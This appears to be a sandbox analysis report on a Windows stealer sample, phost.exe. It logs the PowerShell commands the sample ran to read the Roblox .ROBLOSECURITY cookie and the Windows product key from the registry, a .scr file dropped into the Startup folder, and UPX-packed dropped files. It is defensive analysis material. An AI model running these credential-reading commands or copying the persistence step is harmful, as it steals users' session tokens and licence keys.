              Source: Binary string: 7C:\Users\user\AppData\Local\Temp\jnxiphgt\jnxiphgt.pdbhP source: powershell.exe, 0000004A.00000002.1977970654.000001C716F45000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: phost.exe, 00000000.00000003.1675759091.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2187104659.00007FFE1A461000.00000002.00000001.01000000.00000005.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: phost.exe, phost.exe, 00000001.00000002.2182380751.00007FFDFAB31000.00000040.00000001.01000000.0000000D.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: phost.exe, 00000001.00000002.2184947186.00007FFE101D1000.00000040.00000001.01000000.0000000E.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: phost.exe, 00000001.00000002.2185223962.00007FFE10241000.00000040.00000001.01000000.0000000C.sdmp
              Source: Binary string: D:\a\1\b\libssl-3.pdb source: phost.exe, phost.exe, 00000001.00000002.2182012279.00007FFDFAAE5000.00000040.00000001.01000000.00000011.sdmp
              Source: Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: rar.exe, 00000069.00000000.2046278309.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmp, rar.exe, 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: phost.exe, 00000001.00000002.2184701934.00007FFE0EB31000.00000040.00000001.01000000.00000010.sdmp
              Source: phost.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
              Source: phost.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
              Source: phost.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
              Source: phost.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
              Source: phost.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

              Data Obfuscation

              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jnxiphgt\jnxiphgt.cmdline"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jnxiphgt\jnxiphgt.cmdline"
              Source: _ctypes.pyd.0.dr | Static PE information: real checksum: 0x0 should be: 0x169f0
              Source: unicodedata.pyd.0.dr | Static PE information: real checksum: 0x0 should be: 0x53022
              Source: phost.exe | Static PE information: real checksum: 0x781af9 should be: 0x77e839
              Source: _bz2.pyd.0.dr | Static PE information: real checksum: 0x0 should be: 0x170f7
              Source: libffi-8.dll.0.dr | Static PE information: real checksum: 0x0 should be: 0xa1d1
              Source: _ssl.pyd.0.dr | Static PE information: real checksum: 0x0 should be: 0x150ed
              Source: sqlite3.dll.0.dr | Static PE information: real checksum: 0x0 should be: 0x9f7df
              Source: python312.dll.0.dr | Static PE information: real checksum: 0x0 should be: 0x1ca53b
              Source: libcrypto-3.dll.0.dr | Static PE information: real checksum: 0x0 should be: 0x192b2f
              Source: jnxiphgt.dll.78.dr | Static PE information: real checksum: 0x0 should be: 0xdd1a
              Source: _queue.pyd.0.dr | Static PE information: real checksum: 0x0 should be: 0xcac1
              Source: _socket.pyd.0.dr | Static PE information: real checksum: 0x0 should be: 0x10668
              Source: _decimal.pyd.0.dr | Static PE information: real checksum: 0x0 should be: 0x226ba
              Source: _hashlib.pyd.0.dr | Static PE information: real checksum: 0x0 should be: 0x9cd5
              Source: libssl-3.dll.0.dr | Static PE information: real checksum: 0x0 should be: 0x396d1
              Source: select.pyd.0.dr | Static PE information: real checksum: 0x0 should be: 0x100e6
              Source: _lzma.pyd.0.dr | Static PE information: real checksum: 0x0 should be: 0x23988
              Source: _sqlite3.pyd.0.dr | Static PE information: real checksum: 0x0 should be: 0x1149b
              Source: libffi-8.dll.0.dr | Static PE information: section name: UPX2
              Source: VCRUNTIME140.dll.0.dr | Static PE information: section name: _RDATA
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 12_2_00007FFD990DD2A5 pushad ; iretd 12_2_00007FFD990DD2A6
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 12_2_00007FFD991F85FD push ebx; ret 12_2_00007FFD991F860A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 12_2_00007FFD991F860D push ebx; ret 12_2_00007FFD991F860A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 12_2_00007FFD991F83FC push ebx; ret 12_2_00007FFD991F847A
              Source: initial sample | Static PE information: section name: UPX0
              Source: initial sample | Static PE information: section name: UPX1
              Source: initial sample | Static PE information: section name: UPX0
              Source: initial sample | Static PE information: section name: UPX1
              Source: initial sample | Static PE information: section name: UPX0
              Source: initial sample | Static PE information: section name: UPX1
              Source: initial sample | Static PE information: section name: UPX0
              Source: initial sample | Static PE information: section name: UPX1
              Source: initial sample | Static PE information: section name: UPX0
              Source: initial sample | Static PE information: section name: UPX1
              Source: initial sample | Static PE information: section name: UPX0
              Source: initial sample | Static PE information: section name: UPX1
              Source: initial sample | Static PE information: section name: UPX0
              Source: initial sample | Static PE information: section name: UPX1
              Source: initial sample | Static PE information: section name: UPX0
              Source: initial sample | Static PE information: section name: UPX1
              Source: initial sample | Static PE information: section name: UPX0
              Source: initial sample | Static PE information: section name: UPX1
              Source: initial sample | Static PE information: section name: UPX0
              Source: initial sample | Static PE information: section name: UPX1
              Source: initial sample | Static PE information: section name: UPX0
              Source: initial sample | Static PE information: section name: UPX1
              Source: initial sample | Static PE information: section name: UPX0
              Source: initial sample | Static PE information: section name: UPX1
              Source: initial sample | Static PE information: section name: UPX0
              Source: initial sample | Static PE information: section name: UPX1
              Source: initial sample | Static PE information: section name: UPX0
              Source: initial sample | Static PE information: section name: UPX1
              Source: initial sample | Static PE information: section name: UPX0
              Source: initial sample | Static PE information: section name: UPX1
              Source: initial sample | Static PE information: section name: UPX0
              Source: initial sample | Static PE information: section name: UPX1

              Persistence and Installation Behavior

              Source: C:\Users\user\Desktop\phost.exe | Process created: "C:\Users\user\Desktop\phost.exe"
              Source: C:\Windows\System32\cmd.exe | Process created: reg.exe
              Source: C:\Windows\System32\cmd.exe | Process created: reg.exe
              Source: C:\Windows\System32\cmd.exe | Process created: reg.exe
              Source: C:\Windows\System32\cmd.exe | Process created: attrib.exe
              Source: C:\Windows\System32\cmd.exe | Process created: attrib.exe
              Source: C:\Users\user\Desktop\phost.exe | Process created: attrib.exe
              Source: C:\Windows\System32\cmd.exe | Process created: reg.exe
              Source: C:\Windows\System32\cmd.exe | Process created: reg.exe
              Source: C:\Windows\System32\cmd.exe | Process created: reg.exe
              Source: C:\Windows\System32\cmd.exe | Process created: attrib.exe
              Source: C:\Windows\System32\cmd.exe | Process created: attrib.exe
              Source: C:\Users\user\Desktop\phost.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI32202\select.pyd
              Source: C:\Users\user\Desktop\phost.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI32202\libcrypto-3.dll
              Source: C:\Users\user\Desktop\phost.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI32202\_ssl.pyd
              Source: C:\Users\user\Desktop\phost.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI32202\libffi-8.dll
              Source: C:\Users\user\Desktop\phost.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI32202\_bz2.pyd
              Source: C:\Users\user\Desktop\phost.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI32202\_decimal.pyd
              Source: C:\Users\user\Desktop\phost.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI32202\_hashlib.pyd
              Source: C:\Users\user\Desktop\phost.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exe
              Source: C:\Users\user\Desktop\phost.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI32202\sqlite3.dll
              Source: C:\Users\user\Desktop\phost.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI32202\VCRUNTIME140.dll
              Source: C:\Users\user\Desktop\phost.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI32202\_queue.pyd
              Source: C:\Users\user\Desktop\phost.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI32202\libssl-3.dll
              Source: C:\Users\user\Desktop\phost.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI32202\_ctypes.pyd
              Source: C:\Users\user\Desktop\phost.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI32202\_sqlite3.pyd
              Source: C:\Users\user\Desktop\phost.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI32202\_lzma.pyd
              Source: C:\Users\user\Desktop\phost.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI32202\unicodedata.pyd
              Source: C:\Users\user\Desktop\phost.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI32202\_socket.pyd
              Source: C:\Users\user\Desktop\phost.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI32202\python312.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: C:\Users\user\AppData\Local\Temp\jnxiphgt\jnxiphgt.dll
              Source: C:\Users\user\Desktop\phost.exe | File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\?? ? .scr
              Source: C:\Users\user\Desktop\phost.exe | File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\?? ? .scr

              Hooking and other Techniques for Hiding and Protection

              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 (9 entries)
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 (7 entries)
              Source: C:\Users\user\Desktop\phost.exe | Code function: 0_2_00007FF62CC776B0 GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,0_2_00007FF62CC776B0
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
